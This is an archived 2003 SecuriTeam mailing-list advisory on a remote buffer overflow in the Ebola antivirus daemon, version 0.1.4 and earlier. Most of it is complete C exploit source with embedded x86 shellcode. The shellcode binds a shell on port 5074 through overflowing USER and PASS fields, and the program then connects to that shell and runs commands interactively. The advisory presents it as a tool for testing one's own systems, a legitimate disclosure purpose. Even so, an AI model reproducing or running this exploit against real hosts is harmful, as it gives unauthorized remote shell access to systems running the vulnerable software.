[EXPL] Ebola Username and Password Remote Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 12/11/03
- Previous message: SecuriTeam: "[NT] SHELL32.DLL Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 11 Dec 2003 13:12:37 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Ebola Username and Password Remote Exploit
------------------------------------------------------------------------
SUMMARY
Ebola is a AntiVirus scanning daemon system which offers to improve
considerably the performance of scanning systems such as AMaViS, Inflex
and other such programs which require on demand scanning from various AV
engines. The Ebola daemon contains a remotely exploitable buffer overflow
in its authentication sequence. The following is an exploit code that can
be used to test your system for the mentioned vulnerability.
DETAILS
Vulnerable systems:
* Ebola version 0.1.5
Vulnerable systems:
* Ebola version 0.1.4 and prior
Exploit:
/* 0x333ebola.c => ebola 0.1.4 remote exploit
*
* [-3-] __ OUTSIDERS VIRTUAL SECURITY LABS __ [-3-]
*
* Ebola 0.1.4 remote stack overflow exploit,
* bug found by "Secure Network Operations".
*
* Here the bugged code :
*
* [...]
* int handle_PASS( int ssocket, char *sentline ){
*
* char *passwd;
* char outstr[100];
*
* [...]
* else {
* sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\", pass
\"%s\".\n",username,passwd);
* write(ssocket,outstr,strlen(outstr));
* sleep(_BAD_PASS_SLEEP_TIME);
* }
* [...]
*
* Technical details :
*
* - system : Red Hat Linux 8.0
* - package : ebola-0.1.4.tar.gz (from : http://pldaniels.com/ebola/)
* - requires : libsavi (libsavi.so.3.2.07.031) (from
http://www.sophos.com)
*
* Note : the exploit is unstable.
*
* coded by c0wboy
*
* (c) 0x333 Outsider Security Labs 2003 / www.0x333.org
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define EBOLA 1665
#define SHELL 5074
#define MAX_TG 2
int fdsocket, debug = 0x0;
struct sockaddr_in anger;
struct hostent * cya;
struct {
char *os; /* system os */
char *descpr; /* ebola infos */
int ret; /* return address */
int align; /* align the buffer */
} ebola[] = {
{ "RedHat 8.0 (Psyche)", "ebola-0.1.4.tar.gz", 0xbfffea1c, 3 },
{ "Generic Linux Test ", "generic ebola!", 0x41414141, 0x0 },
{ "exploit code", "outsiders security labs", 0x333, 0x333 },
};
unsigned char shellcode_1[] =
"\x90\x90\x90\x90\x31\xc0\x50\x40\x89\xc3\x50\x40\x50"
"\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2"
"\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66"
"\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80"
"\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1"
"\xb0\x3f\xcd\x80\xeb\x36";
unsigned char shellcode_2[] =
"\x90\x90\x90\x90\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
"\xe1\xb0\x0b\xcd\x80";
void list(void);
void banner(void);
void usage(char *);
void warning(char *);
int ebol4(char *, int, int, int);
int connection(char *, int);
int owned(int);
void list (void)
{
int i;
fprintf (stderr, "\n _(0x0)_ targets _(0x0)_\n");
fprintf (stderr, " ----------------------- \n");
for (i=0; ebola[i].ret != 0x333; i++)
fprintf (stderr, " _(%d)_ %s [%s]\n", i, ebola[i].os,
ebola[i].descpr);
fprintf (stderr, "\n");
exit(EXIT_FAILURE);
}
void banner (void)
{
fprintf (stdout, "\n --- 0x333ebola => ebola-0.1.4 remote exploit
---\n");
fprintf (stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
}
void usage (char *prg)
{
banner();
fprintf (stderr, " Usage : %s [-d hostname] [-p port] [-t target] [-l]
[-V] [-h]\n\n", prg);
fprintf (stderr, "\t-d :\thost to attack\n");
fprintf (stderr, "\t-p :\tebola's port (default %d)\n", EBOLA);
fprintf (stderr, "\t-t :\tselect a target\n");
fprintf (stderr, "\t-l :\tlist targets\n");
fprintf (stderr, "\t-V :\tdebug mode\n");
fprintf (stderr, "\t-h :\tdisplay this help\n\n");
exit (EXIT_FAILURE);
}
void warning (char *error)
{
fprintf (stderr, "%s", error);
close (fdsocket);
exit (EXIT_FAILURE);
}
int ebol4 (char *target, int port, int ret, int align)
{
int i;
char snd[1024]="", rcv[1024]="";
char buf1[92], buf2[101];
int *ebol = (int *)(buf2 + align);
if (connection(target, port)) /* connect to server */
warning ("\n _(0x666)_ Error in connecting to server\n");
else
fprintf (stdout, " _(0x1)_ Connected (!)\n");
/* create buffer */
memset ((char *)buf1, 0x90, sizeof(buf1));
memcpy ((char *)buf1, shellcode_1, strlen(shellcode_1));
memset ((char *)buf2, 0x90, sizeof(buf2));
for (i=0; i<15; i+=4, *ebol++ = ret);
memcpy ((char *)buf2+15+12, shellcode_2, strlen(shellcode_2));
recv (fdsocket, rcv, sizeof(rcv), 0x0);
if (debug)
fprintf (stdout, "\n <debug> server resp. : %s\n", rcv);
fprintf (stdout, " _(0x2)_ Sending USER (shellcode_1)\n");
sprintf (snd, "USER %s\n", buf1);
write (fdsocket, snd, strlen(snd));
recv (fdsocket, rcv, sizeof(rcv), 0x0);
if (debug)
{
fprintf (stdout, " <debug> [w8ing ...] run gdb then press [ENTER]\n");
getchar();
}
fprintf (stdout, " _(0x3)_ Sending PASS (shellcode_2)\n\n");
sprintf (snd, "PASS %s\n", buf2);
write (fdsocket, snd, strlen(snd));
recv (fdsocket, rcv, sizeof(rcv), 0x0);
if (debug)
fprintf (stdout, " <debug> server resp. : %s\n", rcv);
close (fdsocket);
if (!(connection(target, SHELL)))
owned(fdsocket);
else
return 0x666;
return 0x333;
}
int connection (char *target, int port)
{
anger.sin_family = AF_INET;
anger.sin_port = htons(port);
cya = gethostbyname(target);
if (cya==0x0)
return 0x1;
else
{
bcopy (cya->h_addr, &anger.sin_addr, cya->h_length);
if ((fdsocket = socket (AF_INET, SOCK_STREAM, 0x0)) < 0x0)
return 0x1;
else
if ((connect (fdsocket, (struct sockaddr*)&anger, sizeof(anger))) <
0x0)
return 0x1;
}
return 0x0;
}
int owned (int fdsocket)
{
int i;
fd_set hate;
char outside[1024];
char *cmd="uname -a;id;\n\n";
FD_ZERO (&hate);
FD_SET (fdsocket, &hate);
FD_SET (0, &hate);
fprintf (stdout, " (======owned======) (======owned======)
(======owned======)\n\n");
send (fdsocket, cmd, strlen(cmd), 0x0);
for(;;)
{
FD_SET (fdsocket, &hate);
FD_SET (0, &hate);
if (select(FD_SETSIZE, &hate, NULL, NULL, NULL) < 0x0)
break;
if (FD_ISSET(fdsocket, &hate))
{
if ((i = recv(fdsocket, outside, sizeof(outside)-1, 0x0)) < 0x0)
warning (" _(0x333)_ cya hax0r\n");
if (write(1, outside, i) < 0x0)
break;
}
if (FD_ISSET(0x0, &hate))
{
if ((i = read(0x0, outside, sizeof (outside)-1)) < 0x0)
warning(" _(0x333)_ cya hax0r\n");
if (send(fdsocket, outside, i, 0x0) < 0x0)
break;
}
usleep(10);
}
fprintf (stderr, " _(0x333)_ cya hax0r\n");
return 0;
}
int main (int argc, char **argv)
{
int c, i = -1, port = EBOLA;
char *target =NULL;
while ((c = getopt(argc, argv, "hVlt:d:p:")) != EOF)
{
switch (c)
{
case 'p' : port = atoi(optarg); break;
case 'd' : target = optarg; break;
case 't' :
i = atoi(optarg);
if (i<0 || i>MAX_TG-1)
usage(argv[0]);
break;
case 'l' : list(); break;
case 'V' : debug = 0x1; break;
case 'h' :
default : usage(argv[0]);
}
}
if (target == NULL || i == -1)
usage(argv[0]);
banner();
fprintf (stdout, " _(0x0)_ Exploiting <%s:%d> on %s\n", target, port,
ebola[i].os);
if ((ebol4(target, port, ebola[i].ret, ebola[i].align)) == 0x333)
return 0;
else
warning ("\n _(0x666)_ Exploitation Failed !\n\n");
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:c0wboy@tiscali.it> c0wboy.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] SHELL32.DLL Denial of Service"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine
2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell;
... (Securiteam) - [EXPL] pServ User-Agent Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... User-Agent data handling allows
remote attackers to cause pServ to execute ... int op_plat_num; ... void
getshell; ... (Securiteam) - [NEWS] Festalon Heap Corruption
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void fwbof(FILE *fd, int
len, int chr); ... void fwi08(FILE *fd, int num) { ... (Securiteam) - [UNIX] Linux Kernel uselib() Privilege Elevation
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... static int load_elf_library
... Obviously, if the kmem_cache_alloccall sleeps, the newly created VMA ... void
fatal ... (Securiteam) - [EXPL] EPIC4 CTCP Nicknames Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void send_mes(int fd,char *host);
... void wait_connection; ... unsigned int check_version = 0; ...
(Securiteam)
